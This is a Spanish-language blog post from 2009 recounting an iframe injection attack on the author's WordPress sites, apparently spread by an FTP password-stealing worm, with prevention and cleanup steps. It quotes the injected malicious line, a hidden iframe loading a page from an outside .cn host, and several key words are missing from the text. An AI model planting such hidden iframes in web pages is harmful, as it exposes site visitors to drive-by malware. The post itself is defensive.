Tips,Trucos Windows Vista, Windows Seven 7, Windows XP, SEO, Google, Wordpress

Cotoweb Blog

Noticias, soporte tecnico, tips y mucho màs …

Ataques de iframe como prevenirse y como bloquearlos

Publicado por admin en September - 21 - 2009

Dias atras casi me vuelvo loco por unataque masivo de <> a toda la red de mis blogs, contacte al soporte, es mas a ambos soportes, pues tengo mis paginas en dos servidores diferentes y como no entiendo mucho de ingles, traté de traducirlo con el google, indague un poco y encontre cierta informacion sobre estos .

Los  de  se producen generalmente por un  interno en nuestra pc ¿como es esto? es un gusano para programas FTP, como Filezilla, Core Ftp, etc.

Lo que hace este  es como lo haria cualquier otro, usa nuestra propia desatencion, porque generalmente lo que hacemos con los programas FTP es GUARDAR LA CONTRASEÑA, para agilizar la tarea de conectarnos a nuestro servidor, es mas yo lo hago porque no recuerdo la contraseña de mis mas de 10 sitios (eso es otra historia), entonces el  aprovecha esto, se conecta e inserta  malicioso en nuestro index produciendose asi una caida de nuestra , o como en mi caso y de los blogs de wordpress algo como esto:

Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /home/usuario/public_html/index.php on line 17

Parse error: syntax error, unexpected ‘.’ in /home/usuario/public_html/index.php on line 17

Claro que mi soporte tecnico me dijo lo mismo, ud tiene un ataque de , debe realizar lo sigte:
1. No guardar las contraseñas de acceso a su cuenta (de hosting)
2. Pasar un antivirus en su pc, para eliminar cualquier  espia, o malvare.
3. Contactar a su webmaster para corregir el codigo de su 

Dicho esto, me di cuenta que el problema no era de ellos, sino enteramente mio, entonces me baje el index.php (del theme) y busque linea a linea cual era el bendito error, y en el fondo del archivo el  habia borrado algunas lineas y colocado un, que tenia la sigte linea.

< src=”http://bestlitevideo.cn:8080/index.php” width=133 height=120 style=”visibility: hidden”></>

Entonces borre esa linea, agregue lo que habia borrado (por suerte tenia un backup del theme) y volvi a levantarlo, pero todavia no se habia solucionado, el  modifico un par de archivos del wordpress, los index.php y otros archivos de la carpeta de inicio, entonces tuve que modificar (para prevenir) todos los archivos del wordpress.

Ahora se preguntaran como prevenir este tipo de ?

1. Nunca guardar la contraseña de nuestras cuentas de FTP
2. Tener siempre un backup de nuestro script, theme o nuestro  site.
3. Ante cualquier ataque, caida rara de nuestra pagina o algun error en nuestro index contactar al soporte.
4. Tener un buen antivirus y scanear semanalmente nuestra pc en busca de malvare, spybots, etc etc.
5. Ante cualquier ataque no desesperarse sino BUSCAR en google, foros, blogs y comentar nuestro problema.

Como Corregir este ataque especifico de ? (el mio y los parecidos)

1. Borrar la linea  al final de nuestro index.php (el del theme).
2. Corregir las lineas borradas por el  y levantarlo de vuelta (o agregar directo el archivo backup)
3. Ver si el  no ha modificado otro archivo y reemplazarlo por el correcto (el original)
4. En caso de seguir con , modificar el script completo y la plantilla (los backups).

Si alguno sigue con problemas, por favor dejar su comentario que trataremos de socorrerlo :)

Tienes algun comentario acerca de esta nota? Participa!

Patrocinadores
Get Adobe Flash playerPlugin by wpburn.com wordpress themes

Sobre CotoWeb

Webmaster de 166 paginas web y contando ...

Twitter

    Imagenes

    Proximamente

    Tweeter button Facebook button Myspace button
    10 visitors online now
    10 guests, 0 members
    Max visitors today: 14 at 03:03 am UTC
    This month: 27 at 07-28-2010 04:04 pm UTC
    This year: 193 at 05-17-2010 01:32 am UTC
    All time: 193 at 05-17-2010 01:32 am UTC